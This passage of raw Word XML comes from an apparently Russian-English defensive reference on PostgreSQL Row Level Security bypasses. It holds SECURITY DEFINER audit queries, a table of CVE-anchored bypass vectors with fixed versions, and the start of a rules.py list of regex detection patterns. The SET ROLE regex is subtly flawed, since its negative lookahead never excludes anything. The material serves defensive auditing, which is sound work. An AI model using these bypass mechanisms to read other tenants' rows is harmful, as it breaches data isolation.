        <w:t xml:space="preserve">: function-based access control instead of GRANT.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Cross-tenant admin operations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: explicitly designed для admin-roles only (с GRANT EXECUTE ограниченным admin_role).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Корректные SD-функции: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Используют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (защита 3.13.6).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Имеют explicit privilege checks (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IF current_user = 'admin_role'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или подобное).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НЕ дают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT EXECUTE TO PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без careful review.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На critical tables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для extra defence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Признаки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`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (regular task):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SELECT n.nspname, p.proname, r.rolname,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         p.prosrc LIKE '%FROM app.orders%' as accesses_rls_table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  FROM pg_proc p</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  JOIN pg_roles r ON r.oid = p.proowner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    AND (r.rolsuper = true OR r.rolbypassrls = true);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`pg_class` audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: tables с RLS enabled но без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SELECT n.nspname, c.relname, c.relrowsecurity, c.relforcerowsecurity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  FROM pg_class c</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n.oid = c.relnamespace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WHERE c.relrowsecurity = true AND c.relforcerowsecurity = false;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 audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: тестирование SD-функций под different tenant-roles, verifying что data isolation работает.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`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: SECURITY DEFINER-функции с aggregations возвращают «too high» counts.</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Все версии PG с RLS (9.5+, 2016). FORCE ROW LEVEL SECURITY — с PG 9.5. BYPASSRLS attribute — с PG 9.5. Не CVE — pattern класс mis-configuration; не подлежит фикcу на уровне server-а.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Связанные паттерны.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3.17.1 / 3.17.2 / 3.17.3 / 3.17.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-based RLS bypass; 3.17.5 — pattern без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parallel pattern privilege escalation в SD-функциях. Граница: 3.13.6 — RCE через identifier hijack; 3.17.5 — data read через RLS bypass. Защита (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) общая.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 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — третий класс уязвимостей в SD-функциях (identifier injection). Все три — components одного class «SECURITY DEFINER hygiene».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 / 3.17.3 SET ROLE CVE-2024-10978</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — related: oba about role-context interaction with RLS.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owner SD-функций должен быть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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«Row Security Policies» (RLS bypass для owner, FORCE ROW LEVEL SECURITY) — https://www.postgresql.org/docs/current/ddl-rowsecurity.html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«CREATE FUNCTION» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/sql-createfunction.html#SQL-CREATEFUNCTION-SECURITY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«CREATE ROLE» / </w:t>
      </w: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 — https://www.postgresql.org/docs/current/sql-createrole.html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Docs: «ALTER TABLE»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 https://www.postgresql.org/docs/current/sql-altertable.html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2ndQuadrant blog: «Row Level Security and Security Definer Functions» — https://www.2ndquadrant.com/en/blog/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pgexperts blog: «RLS Best Practices» — https://www.pgexperts.com/blog/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Wiki: «Security» / RLS guidance — https://wiki.postgresql.org/wiki/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари: категория 3.17 RLS-обходы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.17 покрывает обходы Row Level Security в PostgreSQL — пять механик, каждая из которых даёт атакующему чтение или запись строк, обходя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE POLICY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Четыре подраздела якорятся на CVE (R9 / R11 / R8 / R26), пятый — на documented PostgreSQL pattern без CVE (SECURITY DEFINER + RLS bypass для owner). Общий тезис: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS — defence-in-depth, не sole authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Bug в reset path SET ROLE (3.17.1, 3.17.3), missed policy enforcement в MERGE (3.17.2), side-channel через optimizer statistics (3.17.4), или неосторожный SECURITY DEFINER (3.17.5) — любой из этих векторов даёт cross-tenant data leak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Главный практический вывод: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade на patched PG версии</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (для CVE-anchored — обязательно), плюс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`FORCE ROW LEVEL SECURITY`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на critical tables (для defence против 3.17.5 и unknown future CVE), плюс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">audit всех SECURITY DEFINER функций</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, читающих RLS-protected данные.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Подразделы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3.17.1 Subquery + plan-cache (R9, CVE-2024-10976)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RLS-фильтр кэшируется в plan под одной ролью, исполняется под другой через subquery/CTE/SQL function paths. Уязвимо PG ≤ 17.0/16.4/15.8/14.13/13.16/12.20, фикс 14.11.2024. CVSS 4.2.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3.17.2 MERGE RLS (R11, CVE-2023-39418)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — MERGE не применяет UPDATE/SELECT RLS policies в PG 15.0–15.3 (узкое окно). Фикс PG 15.4 (10.08.2023). CVSS 3.1.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3.17.3 SET ROLE reset (R8, CVE-2024-10978)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — тот же CVE как 3.13.1, но фокус на data exfiltration (vs privilege escalation). Уязвимо PG ≤ 17.0/16.4/...12.20, фикс 14.11.2024. CVSS 4.2.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3.17.4 Optimizer stats (R26, CVE-2025-8713)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — custom operator bypass column ACL/RLS через optimizer statistics leak в planning phase. Уязвимо PG ≤ 17.5/16.9/15.13/14.18/13.21, фикс 14.08.2025.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3.17.5 SECURITY DEFINER + RLS pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — без CVE. SD-функция от superuser/owner получает RLS bypass; GRANT EXECUTE обычным tenants даёт cross-tenant aggregate/row leak. Защита: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 явный фильтр в SD-функции + SECURITY INVOKER default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводная таблица 5 векторов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Подраздел</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CVSS</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Затронуто (≤)</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 фикса</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Min privilege атакующего</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Связанная категория</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CVE-2024-10976</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17.0, 16.4, 15.8, 14.13, 13.16, 12.20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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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tenant role + connection pool + subquery в SQL</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CVE-2023-39418</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только 15.0–15.3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10.08.2023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tenant role + MERGE-statement</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5.3</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17.0, 16.4, 15.8, 14.13, 13.16, 12.20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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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tenant role + SET ROLE per-request + pool</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17.5, 16.9, 15.13, 14.18, 13.21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17.6, 16.10, 15.14, 14.19, 13.22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14.08.2025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OPERATOR/FUNCTION + side-channel</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3.8.6</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(pattern)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версии</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(mitigations only)</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EXECUTE на SD-функцию</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3.13.6, 3.16.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Хук для rules.py: класс RLS_BYPASS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># rules.py фрагмент — детекция RLS bypass patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import re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RLS_BYPASS_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.17.1 / 3.17.3: SET ROLE без DISCARD ALL после</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bSET\s+ROLE\b.*(?!DISCARD\s+ALL)", re.IGNORECASE | re.DOTALL),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bSET\s+SESSION\s+AUTHORIZATION\b", re.IGNORECASE),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3.17.2: MERGE на RLS-protected tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\bMERGE\s+INTO\b", re.IGNORECASE),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3.17.4: custom operators с restrict/join estimator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
